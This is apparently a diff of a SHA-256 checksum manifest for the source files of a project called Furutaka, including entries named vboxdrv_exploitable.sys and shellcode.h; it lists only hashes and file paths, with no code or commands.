-746efc13f8d0f96856876e4027a6c7d1f28f2791173c492ef185a436fd464bf6 *Source\Furutaka\cui.c -3a5e784c79832cd497782267212edf8118431a38e16c11f890e413a12e3cb68c *Source\Furutaka\cui.h 
-cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys -01e8b1256c0ea978f3f100602732e1314a5108a2aa4563f1d4c98e0d5faebb85 *Source\Furutaka\Furutaka.sln -c7eaba7f4bb49fceac5c13d1a2abd23782c14c167ea6c57a7f65407cd7034149 *Source\Furutaka\Furutaka.vcxproj +e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c +6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h +24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln +16bd5cb1f9114683a8f5b91d8f5492319b64f5b1dd5103b56c9c29c39b06237b *Source\Furutaka\Furutaka.vcxproj b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters -2b04b5603a1ad01bf21aadb13539b7de81e4a6c414b187c4a021dc8356da3e37 *Source\Furutaka\Furutaka.vcxproj.user -1f1f6d73a914729da08ad347c3bdb7d031c51a354339d0a26b72efcb799dfde1 *Source\Furutaka\global.h -c90a5fa589457ed25641ec8bd7da6b3be603ad5001fa9c4c8c378a47068737d2 *Source\Furutaka\instdrv.c -964d46b2540f1e91797750eb1f2b9c4c0f037792c2066d653727e223222b6208 *Source\Furutaka\instdrv.h -8f309aca118c967f283db492cfda3493bded9dbafebf580a4b5ce8bfd22ce318 *Source\Furutaka\main.c +b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user +1a80c208b491fcd2704761490a12067ae8aa73d8bde834a20920cbd231affaf7 *Source\Furutaka\global.h +94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c +33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h +c1747f460d8e42e18f3fce8c30c51be75fe382332f586756bbb86af81e8a5a45 *Source\Furutaka\main.c +8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h +fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h +2dad59a7d37bfc28fc1e0f3599584454084e5837649facde829373f41b86e08f 
*Source\Furutaka\resource.rc +f8cafd307ba14b60970fe8caf73fbb2f178d3877a3d8b51f507b431e3bf5506e *Source\Furutaka\shellcode.h +fd0fc26c051a852fe3eaf9cb44615543b92e642274fc1eb58b53f23457fd4e89 *Source\Furutaka\sup.c +059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h +12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h +cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Furutaka\minirtl\cmdline.c bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Furutaka\minirtl\cmdline.h 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Furutaka\minirtl\minirtl.h @@ -38,10 +45,3 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Furutak 27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066 *Source\Furutaka\minirtl\_strend.c 60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb *Source\Furutaka\minirtl\_strlen.c 87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Furutaka\minirtl\_strncmpi.c -8ad5fc39c371439f2d53028e660b2d84f9238651e6311b4b28c1b714da1ee7fc *Source\Furutaka\ntos.h -fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h -8a28b38ff5a64f0d2a52c019ce8a77ed1f098cfa499c2f27208b0621690022fc *Source\Furutaka\resource.rc -a12de2f7e249ea16519644494c7724e8d5aee23e3744a98019cf9821f054db75 *Source\Furutaka\shellcode.h -2978d95a800f049956b0e3ef53d398003d94e051a463e79796aff4247959e93e *Source\Furutaka\sup.c -d131357000587b1c25adb90dece9558afc38c4fbe77d04e8acb3e6c84a5e2fd1 *Source\Furutaka\sup.h -12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h